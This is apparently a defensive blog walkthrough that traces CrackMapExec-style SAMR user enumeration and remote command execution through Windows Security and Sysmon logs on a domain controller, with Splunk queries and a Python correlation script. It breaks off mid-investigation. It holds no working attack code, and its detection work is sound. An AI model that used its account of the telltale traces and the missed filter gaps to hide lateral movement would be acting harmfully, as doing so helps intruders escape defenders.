04/07/2019 11:08:41 PM LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=3 EventType=4 Type=Information ComputerName=SECNIK-2K19.securitynik.local User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 TaskCategory=Network connection detected (rule: NetworkConnect) OpCode=Info RecordNumber=12826 Keywords=None Message=Network connection detected: RuleName: UtcTime: 2019-04-08 06:08:40.639 ProcessGuid: {48be9e4e-df2a-5caa-0000-0010eb030000} ProcessId: 4 Image: System User: NT AUTHORITY\SYSTEM Protocol: tcp Initiated: false SourceIsIpv6: false SourceIp: 10.0.0.105 SourceHostname: SECNIK-2K19.securitynik.local SourcePort: 445 SourcePortName: microsoft-ds DestinationIsIpv6: false DestinationIp: 10.0.0.100 DestinationHostname: DestinationPort: 34564 DestinationPortName:
From above, we see Sysmon (Event ID 3) reporting a network connection on the host at 10.0.0.105. Note "Initiated: false": this is an inbound connection, so Sysmon's "Source" fields describe the local end, TCP port 445 (SMB) on 10.0.0.105, and the "Destination" fields describe the remote end, 10.0.0.100 on ephemeral port 34564. In other words, 10.0.0.100 connected to SMB on this server.
As we look below, we see an example of the shares being accessed:
04/08/2019 06:19:50 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5145 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Detailed File Share OpCode=Info RecordNumber=43571 Keywords=Audit Success Message=A network share object was checked to see whether client can be granted desired access. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x5B3EF6 Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 35710 Share Information: Share Name: \\*\SYSVOL Share Path: \??\C:\Windows\SYSVOL\sysvol Relative Target Name: LusqPJemAo Access Request Information: Access Mask: 0x110080 Accesses: DELETE SYNCHRONIZE ReadAttributes Access Check Results: DELETE: Granted by D:(A;;FA;;;BA) SYNCHRONIZE: Granted by D:(A;;0x1200a9;;;WD) ReadAttributes: Granted by D:(A;;0x1200a9;;;WD)
Let's take a better view of these shares being accessed via an image. Here is the filter I used in Splunk to see this data:
* NOT "Files\\SplunkUniversalForwarder" NOT "0:0:0:0:0:0:0:1" NOT "127.0.0.1" NOT "fe80:0:0:0:89f9:808e:8310:538e" NOT "Resource Assignment" NOT "224.0.0.252" "10.0.0.100" | stats count by Source_Address,Source_Port,ComputerName,Account_Name,Logon_ID,Security_ID,TaskCategory,Share_Name,Share_Path,Relative_Target_Name
Moving on to the user enumeration, the first event we see is the Windows Filtering Platform (Event ID 5156) permitting the inbound connection from 10.0.0.100:36662 to 10.0.0.105 on port 445. Keep the source port, 36662, in mind: it is carried through the 4624, 5140 and 5145 events that follow, which lets us tie them all to this one TCP connection.
04/09/2019 06:08:41 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5156 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Filtering Platform Connection OpCode=Info RecordNumber=53458 Keywords=Audit Success Message=The Windows Filtering Platform has permitted a connection. Application Information: Process ID: 4 Application Name: System Network Information: Direction: Inbound Source Address: 10.0.0.100 Source Port: 36662 Destination Address: 10.0.0.105 Destination Port: 445 Protocol: 6 Filter Information: Filter Run-Time ID: 0 Layer Name: Receive/Accept Layer Run-Time ID: 44
After the firewall permit, we see "Administrator" logging on successfully (Event ID 4624). Logon Type 3 is a network logon, and the authentication package is NTLM (NTLM V2), which is what an SMB session authenticated with a password or a hash looks like. This session is assigned Logon ID 0xA8C3DC, the key we will use to tie the remaining events together.
04/09/2019 06:08:42 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4624 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Logon OpCode=Info RecordNumber=53461 Keywords=Audit Success Message=An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xA8C3DC Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x0 Process Name: - Network Information: Workstation Name: - Source Network Address: 10.0.0.100 Source Port: 36662 Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): NTLM V2 Key Length: 128 This event is generated when a logon session is created. It is generated on the computer that was accessed.
Next up we see the "Administrator" account, from source IP address 10.0.0.100, accessing the share "\\*\IPC$" (Event ID 5140). IPC$ is the share through which named pipes, and therefore MS-RPC interfaces, are reached.
04/09/2019 06:08:42 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5140 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=File Share OpCode=Info RecordNumber=53462 Keywords=Audit Success Message=A network share object was accessed. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xA8C3DC Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 36662 Share Information: Share Name: \\*\IPC$ Share Path: Access Request Information: Access Mask: 0x1 Accesses: ReadData (or ListDirectory)
After the share has been accessed, we see below a permission check (Event ID 5145) against that share. The important detail is the Relative Target Name: "samr". That is the SAMR named pipe, the RPC interface used to query users, groups and domain parameters from the SAM. The samr pipe being opened over IPC$ from a remote address is the clearest single indicator of this kind of enumeration.
04/09/2019 06:08:42 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5145 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Detailed File Share OpCode=Info RecordNumber=53463 Keywords=Audit Success Message=A network share object was checked to see whether client can be granted desired access. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xA8C3DC Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 36662 Share Information: Share Name: \\*\IPC$ Share Path: Relative Target Name: samr Access Request Information: Access Mask: 0x3 Accesses: ReadData (or ListDirectory) WriteData (or AddFile) Access Check Results: -
We next see a handle being requested to an object (Event ID 4661). Note the process servicing the request is "lsass.exe". The Object Type is SAM_DOMAIN and the Object Name is the domain itself, DC=securitynik,DC=local: because this host is a domain controller, SAM requests are serviced against Active Directory rather than a local SAM database, which is why the object is named by its directory distinguished name. The requested accesses include "ListAccounts", from which we can conclude the accounts in the domain were being listed.
04/09/2019 06:08:42 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4661 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=SAM OpCode=Info RecordNumber=53464 Keywords=Audit Success Message=A handle to an object was requested. Subject : Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xA8C3DC Object: Object Server: Security Account Manager Object Type: SAM_DOMAIN Object Name: DC=securitynik,DC=local Handle ID: 0x2555508d260 Process Information: Process ID: 0x22c Process Name: C:\Windows\System32\lsass.exe Access Request Information: Transaction ID: {00000000-0000-0000-0000-000000000000} Accesses: DELETE READ_CONTROL WRITE_DAC WRITE_OWNER ReadPasswordParameters ReadOtherParameters WriteOtherParameters CreateUser CreateGlobalGroup CreateLocalGroup GetLocalGroupMembership ListAccounts Access Reasons: - Access Mask: 0xF01FD Privileges Used for Access Check: - Properties: --- {19195a5a-6da0-11d0-afd3-00c04fd930c9} DELETE READ_CONTROL WRITE_DAC WRITE_OWNER ReadPasswordParameters ReadOtherParameters WriteOtherParameters CreateUser CreateGlobalGroup CreateLocalGroup GetLocalGroupMembership ListAccounts {c7407360-20bf-11d0-a768-00aa006e0529} {bf9679a4-0de6-11d0-a285-00aa003049e2} {bf9679a5-0de6-11d0-a285-00aa003049e2} {bf9679a6-0de6-11d0-a285-00aa003049e2} {bf9679bb-0de6-11d0-a285-00aa003049e2} {bf9679c2-0de6-11d0-a285-00aa003049e2} {bf9679c3-0de6-11d0-a285-00aa003049e2} {bf967a09-0de6-11d0-a285-00aa003049e2} {bf967a0b-0de6-11d0-a285-00aa003049e2} {b8119fd0-04f6-4762-ab7a-4986c76b3f9a} {bf967a34-0de6-11d0-a285-00aa003049e2} {bf967a33-0de6-11d0-a285-00aa003049e2} {bf9679c5-0de6-11d0-a285-00aa003049e2} {bf967a61-0de6-11d0-a285-00aa003049e2} {bf967977-0de6-11d0-a285-00aa003049e2} {bf96795e-0de6-11d0-a285-00aa003049e2} {bf9679ea-0de6-11d0-a285-00aa003049e2} {ab721a52-1e2f-11d0-9819-00aa0040529b} Restricted SID Count: 0
Immediately after, we see another handle request. This time the Object Type is SAM_USER, the Object Name is the Administrator's SID, and the accesses include "ListGroups": the group memberships of that user are being read. As above, additional information is being retrieved; the GUIDs under "Properties" are the schema property sets and attributes covered by the access check, each representing a different item.
04/09/2019 06:08:42 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4661 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=SAM OpCode=Info RecordNumber=53465 Keywords=Audit Success Message=A handle to an object was requested. Subject : Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xA8C3DC Object: Object Server: Security Account Manager Object Type: SAM_USER Object Name: S-1-5-21-4078604576-3869073289-8028338-500 Handle ID: 0x2555508e5a0 Process Information: Process ID: 0x22c Process Name: C:\Windows\System32\lsass.exe Access Request Information: Transaction ID: {00000000-0000-0000-0000-000000000000} Accesses: DELETE READ_CONTROL WRITE_DAC WRITE_OWNER ReadGeneralInformation ReadPreferences WritePreferences ReadLogon ReadAccount WriteAccount SetPassword (without knowledge of old password) ListGroups Access Reasons: - Access Mask: 0xF01BF Privileges Used for Access Check: - Properties: --- {bf967aba-0de6-11d0-a285-00aa003049e2} DELETE READ_CONTROL WRITE_DAC WRITE_OWNER ReadGeneralInformation ReadPreferences WritePreferences ReadLogon ReadAccount WriteAccount SetPassword (without knowledge of old password) ListGroups {59ba2f42-79a2-11d0-9020-00c04fc2d3cf} {bf967938-0de6-11d0-a285-00aa003049e2} {5fd42471-1262-11d0-a060-00aa006c33ed} {bf9679e8-0de6-11d0-a285-00aa003049e2} {bf967a00-0de6-11d0-a285-00aa003049e2} {3e0abfd0-126a-11d0-a060-00aa006c33ed} {bf967a6a-0de6-11d0-a285-00aa003049e2} {bf967953-0de6-11d0-a285-00aa003049e2} {4c164200-20c0-11d0-a768-00aa006e0529} {bf967915-0de6-11d0-a285-00aa003049e2} {bf967a0a-0de6-11d0-a285-00aa003049e2} {bf967a68-0de6-11d0-a285-00aa003049e2} {bf967a6d-0de6-11d0-a285-00aa003049e2} {5f202010-79a5-11d0-9020-00c04fc2d4cf} {bf96792e-0de6-11d0-a285-00aa003049e2} {bf967985-0de6-11d0-a285-00aa003049e2} {bf967986-0de6-11d0-a285-00aa003049e2} {bf967996-0de6-11d0-a285-00aa003049e2} {bf967997-0de6-11d0-a285-00aa003049e2} {bf9679aa-0de6-11d0-a285-00aa003049e2} {bf9679ab-0de6-11d0-a285-00aa003049e2} {bf9679ac-0de6-11d0-a285-00aa003049e2} {bf967a05-0de6-11d0-a285-00aa003049e2} {bf9679a8-0de6-11d0-a285-00aa003049e2} {e48d0154-bcf8-11d1-8702-00c04fb96050} {bf967950-0de6-11d0-a285-00aa003049e2} {bc0ac240-79a9-11d0-9020-00c04fc2d4cf} {bf967991-0de6-11d0-a285-00aa003049e2} {ab721a53-1e2f-11d0-9819-00aa0040529b} {00299570-246d-11d0-a768-00aa006e0529} {7ed84960-ad10-11d0-8a92-00aa006e0529} Restricted SID Count: 0
Let's now look at what the logs look like when the password policy is enumerated, so we know how to discover such a request.
04/17/2019 08:11:15 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4661 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=SAM OpCode=Info RecordNumber=150020 Keywords=Audit Success Message=A handle to an object was requested. Subject : Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x55E205 Object: Object Server: Security Account Manager Object Type: SAM_DOMAIN Object Name: DC=securitynik,DC=local Handle ID: 0x1fa0565e940 Process Information: Process ID: 0x234 Process Name: C:\Windows\System32\lsass.exe Access Request Information: Transaction ID: {00000000-0000-0000-0000-000000000000} Accesses: DELETE READ_CONTROL WRITE_DAC WRITE_OWNER ReadPasswordParameters ReadOtherParameters WriteOtherParameters CreateUser CreateGlobalGroup CreateLocalGroup GetLocalGroupMembership ListAccounts Access Reasons: - Access Mask: 0xF01FD Privileges Used for Access Check: - Properties: --- {19195a5a-6da0-11d0-afd3-00c04fd930c9} DELETE READ_CONTROL WRITE_DAC WRITE_OWNER ReadPasswordParameters ReadOtherParameters WriteOtherParameters CreateUser CreateGlobalGroup CreateLocalGroup GetLocalGroupMembership ListAccounts {c7407360-20bf-11d0-a768-00aa006e0529} {bf9679a4-0de6-11d0-a285-00aa003049e2} {bf9679a5-0de6-11d0-a285-00aa003049e2} {bf9679a6-0de6-11d0-a285-00aa003049e2} {bf9679bb-0de6-11d0-a285-00aa003049e2} {bf9679c2-0de6-11d0-a285-00aa003049e2} {bf9679c3-0de6-11d0-a285-00aa003049e2} {bf967a09-0de6-11d0-a285-00aa003049e2} {bf967a0b-0de6-11d0-a285-00aa003049e2} {b8119fd0-04f6-4762-ab7a-4986c76b3f9a} {bf967a34-0de6-11d0-a285-00aa003049e2} {bf967a33-0de6-11d0-a285-00aa003049e2} {bf9679c5-0de6-11d0-a285-00aa003049e2} {bf967a61-0de6-11d0-a285-00aa003049e2} {bf967977-0de6-11d0-a285-00aa003049e2} {bf96795e-0de6-11d0-a285-00aa003049e2} {bf9679ea-0de6-11d0-a285-00aa003049e2} {ab721a52-1e2f-11d0-9819-00aa0040529b} Restricted SID Count: 0
The above reflects the password policy being requested (note "ReadPasswordParameters" among the accesses), along with other domain parameters. Be aware, though, that this 4661 is the same SAM_DOMAIN handle request we saw during the user enumeration above: same object, same Access Mask 0xF01FD and the same list of accesses. The 4661 on its own does not tell you whether the client went on to read the password policy or to list the users; all it tells you is that a handle to the domain's SAM was opened from this logon session, and you have to look at what else that Logon ID did. See the reference section for the link to translate the values.
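To turn the chain above into something repeatable, here is an added example (not code from the original post or from CrackMapExec) that correlates Security events by Logon ID and flags a session as SAMR-based enumeration when it shows a network logon, the "samr" pipe opened over IPC$, and lsass handing out SAM_DOMAIN / SAM_USER handles with ListAccounts or ListGroups. The events it runs over are constructed, shortened copies of the ones shown above, plus a made-up benign SYSVOL session as a control; the field labels are taken from the page's own log layout, so it will read real Splunk-exported lines of the same shape.

```python
"""Correlate Security events by Logon ID to flag SAMR-based account enumeration."""
import re
from collections import defaultdict

# Constructed, shortened copies of the events shown above (only the fields the rules read are
# kept), plus a made-up benign session (the DC's machine account reading SYSVOL) as a control.
SAMPLE_EVENTS = [
    "EventCode=4624 Message=An account was successfully logged on. Subject: Account Name: - Logon ID: 0x0 "
    "Logon Information: Logon Type: 3 New Logon: Account Name: Administrator Account Domain: SECURITYNIK "
    "Logon ID: 0xA8C3DC Network Information: Source Network Address: 10.0.0.100 Source Port: 36662 "
    "Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM",
    "EventCode=5140 Message=A network share object was accessed. Subject: Account Name: Administrator "
    "Logon ID: 0xA8C3DC Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 36662 "
    "Share Information: Share Name: \\\\*\\IPC$ Share Path: Access Request Information: Access Mask: 0x1",
    "EventCode=5145 Message=A network share object was checked to see whether client can be granted desired "
    "access. Subject: Account Name: Administrator Logon ID: 0xA8C3DC Network Information: Object Type: File "
    "Source Address: 10.0.0.100 Source Port: 36662 Share Information: Share Name: \\\\*\\IPC$ Share Path: "
    "Relative Target Name: samr Access Request Information: Access Mask: 0x3 "
    "Accesses: ReadData (or ListDirectory) WriteData (or AddFile) Access Check Results: -",
    "EventCode=4661 Message=A handle to an object was requested. Subject : Account Name: Administrator "
    "Logon ID: 0xA8C3DC Object: Object Server: Security Account Manager Object Type: SAM_DOMAIN "
    "Object Name: DC=securitynik,DC=local Process Information: Process Name: C:\\Windows\\System32\\lsass.exe "
    "Access Request Information: Accesses: DELETE READ_CONTROL ReadPasswordParameters CreateUser "
    "GetLocalGroupMembership ListAccounts Access Reasons: - Access Mask: 0xF01FD",
    "EventCode=4661 Message=A handle to an object was requested. Subject : Account Name: Administrator "
    "Logon ID: 0xA8C3DC Object: Object Server: Security Account Manager Object Type: SAM_USER "
    "Object Name: S-1-5-21-4078604576-3869073289-8028338-500 Process Name: C:\\Windows\\System32\\lsass.exe "
    "Accesses: DELETE READ_CONTROL ReadGeneralInformation ReadAccount ListGroups Access Reasons: - Access Mask: 0xF01BF",
    # Control session (constructed): machine account reading group policy from SYSVOL, no samr, no 4661.
    "EventCode=4624 Message=An account was successfully logged on. Subject: Account Name: - Logon ID: 0x0 "
    "Logon Type: 3 New Logon: Account Name: SECNIK-2K19$ Logon ID: 0xB4D870 "
    "Source Network Address: fe80::89f9:808e:8310:538e Authentication Package: Kerberos",
    "EventCode=5145 Message=A network share object was checked to see whether client can be granted desired "
    "access. Subject: Account Name: SECNIK-2K19$ Logon ID: 0xB4D870 Source Address: fe80::89f9:808e:8310:538e "
    "Share Name: \\\\*\\SYSVOL Relative Target Name: securitynik.local\\Policies Access Mask: 0x100081 "
    "Accesses: SYNCHRONIZE ReadAttributes Access Check Results: -",
]


def get(event, pattern):
    """First capture group of pattern in event, or '' when the label is absent."""
    m = re.search(pattern, event)
    return m.group(1) if m else ""


def parse(event):
    """Pull the handful of 'Label: value' fields the rules need out of one exported event."""
    code = get(event, r"EventCode=(\d+)")
    # 4624 carries two subjects; the session being created is the one under "New Logon:".
    scope = event.split("New Logon:", 1)[-1] if code == "4624" else event
    return {
        "code": code,
        "logon_id": get(scope, r"Logon ID: (0x[0-9A-Fa-f]+)"),
        "account": get(scope, r"Account Name: (\S+)"),
        "logon_type": get(event, r"Logon Type: (\d+)"),
        "source": get(event, r"Source (?:Network )?Address: (\S+)"),
        "share": get(event, r"Share Name: (\S+)"),
        "target": get(event, r"Relative Target Name: (\S+)"),
        "object_type": get(event, r"Object Type: (\S+)"),
        "accesses": get(event, r"Accesses: (.*?) Access (?:Reasons|Check Results)"),
        "auth": get(event, r"Authentication Package: (\S+)"),
    }


def analyse(events):
    """Group events by Logon ID; return {logon_id: summary} for sessions that opened the samr pipe
    over IPC$ and then obtained SAM_DOMAIN/SAM_USER handles with ListAccounts or ListGroups."""
    sessions = defaultdict(list)
    for e in map(parse, events):
        if e["logon_id"]:
            sessions[e["logon_id"]].append(e)
    findings = {}
    for logon_id, evs in sessions.items():
        logon = next((e for e in evs if e["code"] == "4624"), None)
        samr_pipe = any(e["code"] == "5145" and e["share"].endswith("IPC$")
                        and e["target"].lower() == "samr" for e in evs)
        domain_handles = [e for e in evs if e["code"] == "4661" and e["object_type"] == "SAM_DOMAIN"]
        user_handles = [e for e in evs if e["code"] == "4661" and e["object_type"] == "SAM_USER"]
        list_accounts = any("ListAccounts" in e["accesses"] for e in domain_handles)
        list_groups = any("ListGroups" in e["accesses"] for e in user_handles)
        if not (samr_pipe and (list_accounts or list_groups)):
            continue
        findings[logon_id] = {
            "account": logon["account"] if logon else "?",
            "source": logon["source"] if logon else next((e["source"] for e in evs if e["source"]), "?"),
            "network_logon": bool(logon and logon["logon_type"] == "3"),
            "auth": logon["auth"] if logon else "?",
            "samr_pipe": samr_pipe,
            "list_accounts": list_accounts,
            "list_groups": list_groups,
            # Same handle and access mask as the user listing: this flag alone cannot separate a
            # password-policy query from a user enumeration (see the two 4661 events above).
            "read_password_parameters": any("ReadPasswordParameters" in e["accesses"] for e in domain_handles),
        }
    return findings


if __name__ == "__main__":
    for logon_id, summary in analyse(SAMPLE_EVENTS).items():
        print(f"{logon_id}: {summary}")
```

Run as a script it prints only the 0xA8C3DC session, with the source address and NTLM authentication pulled from its 4624. In Splunk the same idea is a stats by Logon_ID that collects the values of Relative_Target_Name, Object_Type and Accesses, followed by a where clause on "samr" and "SAM_DOMAIN".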
Let's now see what the communication looks like when crackmapexec runs a powershell command.
To help us understand the connections which are created, let's take a look at some statistics via Splunk. Specifically, along with some other important information, let's identify the different logon sessions; we can track these via the "Logon_ID" field, as shown below.
* NOT("splunk" OR "activedirectory.webservices.exe" OR "::1" OR "127.0.0.1" OR Protocol=17) | stats count by Source_Address,Source_Port,Logon_ID,Account_Name,Share_Name

Source_Address              Source_Port  Logon_ID  Account_Name   Share_Name   count
10.0.0.100                  53494        0xB48A3E  Administrator  \\*\C$       21
10.0.0.100                  53496        0xB48A64  Administrator  \\*\IPC$     2
fe80::89f9:808e:8310:538e   56096        0xB4D870  SECNIK-2K19$   \\*\SYSVOL   2
fe80::89f9:808e:8310:538e   56100        0xB5543B  SECNIK-2K19$   \\*\SYSVOL   3
fe80::89f9:808e:8310:538e   56103        0x3E4     SECNIK-2K19$   \\*\IPC$     1
From the information above, the first session (Logon ID 0xB48A3E, 21 events against \\*\C$) is the busiest. Let's look into that session to see what we can figure out.
Using a filter which focuses in on Logon_ID "0xB48A3E", we see the following:
04/18/2019 01:32:43 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4624 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Logon OpCode=Info RecordNumber=172526 Keywords=Audit Success Message=An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A3E Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x0 Process Name: - Network Information: Workstation Name: - Source Network Address: 10.0.0.100 Source Port: 53494 Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): NTLM V2 Key Length: 128
Above we see user "Administrator" logging on successfully from "10.0.0.100:53494" (again a Logon Type 3 network logon over NTLM) and being assigned the Logon ID "0xB48A3E".
We then see below that the share "\\*\C$" was accessed (Event ID 5140) with ReadData (or ListDirectory) access.
04/18/2019 01:32:44 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5140 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=File Share OpCode=Info RecordNumber=172553 Keywords=Audit Success Message=A network share object was accessed. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A3E Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 53494 Share Information: Share Name: \\*\C$ Share Path: \??\C:\ Access Request Information: Access Mask: 0x1 Accesses: ReadData (or ListDirectory)
Next, below, we see the target "Windows\Temp\kJpSGP" on the C$ share being checked (Event ID 5145) to see whether ReadData access can be granted. Keep that file name in mind; it comes back later.
04/18/2019 01:32:44 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5145 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Detailed File Share OpCode=Info RecordNumber=172554 Keywords=Audit Success Message=A network share object was checked to see whether client can be granted desired access. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A3E Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 53494 Share Information: Share Name: \\*\C$ Share Path: \??\C:\ Relative Target Name: Windows\Temp\kJpSGP Access Request Information: Access Mask: 0x1 Accesses: ReadData (or ListDirectory) Access Check Results:
One second later we see the same check repeated for "Windows\Temp\kJpSGP".
04/18/2019 01:32:45 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5145 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Detailed File Share OpCode=Info RecordNumber=172568 Keywords=Audit Success Message=A network share object was checked to see whether client can be granted desired access. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A3E Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 53494 Share Information: Share Name: \\*\C$ Share Path: \??\C:\ Relative Target Name: Windows\Temp\kJpSGP Access Request Information: Access Mask: 0x1 Accesses: ReadData (or ListDirectory) Access Check Results:
Following the event above, we see below a check for DELETE and ReadAttributes access on the same file, that is, whether the necessary permissions exist to delete it.
04/18/2019 01:32:45 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5145 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Detailed File Share OpCode=Info RecordNumber=172570 Keywords=Audit Success Message=A network share object was checked to see whether client can be granted desired access. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A3E Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 53494 Share Information: Share Name: \\*\C$ Share Path: \??\C:\ Relative Target Name: Windows\Temp\kJpSGP Access Request Information: Access Mask: 0x10080 Accesses: DELETE ReadAttributes Access Check Results:
There were a number of further checks of this kind; in the interest of space and time I chose to leave them out of this analysis.
Ultimately, this account logged off as shown below.
04/18/2019 01:32:47 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4634 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Logoff OpCode=Info RecordNumber=172610 Keywords=Audit Success Message=An account was logged off. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A3E Logon Type: 3
Let's now see what is going on with Logon ID "0xB48A64", the second session from IP 10.0.0.100 (source port 53496, two events against \\*\IPC$).
04/18/2019 01:32:43 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4624 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Logon OpCode=Info RecordNumber=172530 Keywords=Audit Success Message=An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A64 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x0 Process Name: - Network Information: Workstation Name: - Source Network Address: 10.0.0.100 Source Port: 53496 Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): NTLM V2 Key Length: 128
Above we see the logon which is ultimately followed by a logoff as shown below.
04/18/2019 01:32:47 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4634 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Logoff OpCode=Info RecordNumber=172609 Keywords=Audit Success Message=An account was logged off. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A64 Logon Type: 3
At this point my conclusion was that we had missed something in our analysis, and that it had to be because of our initial filter. While that filter helped us detect some activity, it did not help us find where the actual PowerShell command was executed. Looking back at the search, the reason is visible: it excluded "127.0.0.1", and "stats count by ... Share_Name" only counts events that carry a Share_Name, so a session that touched the share only over loopback, or that produced process-creation events rather than share events, never appeared in the table. Let's step back for a second and look between the logon and logoff times above to see if we can get better insight into what transpired during that window.
As I scrolled through the logs, I noticed a Logon ID which was not caught by my previous filter: "0xB48AC1". You may also notice that the source "10.0.0.100:37794" did not appear in our table above. Hopefully my oversight helps you see how easy it is to miss important evidence.
Below we see that the account logged on successfully:
04/18/2019 01:32:44 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4624 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Logon OpCode=Info RecordNumber=172543 Keywords=Audit Success Message=An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48AC1 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x0 Process Name: - Network Information: Workstation Name: - Source Network Address: 10.0.0.100 Source Port: 37794 Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): NTLM V2 Key Length: 128
Now that we have this new Logon ID of "0xB48AC1", we can set a filter to focus on the activity performed by this Logon ID. Let's push ahead to see what we can find of relevance.
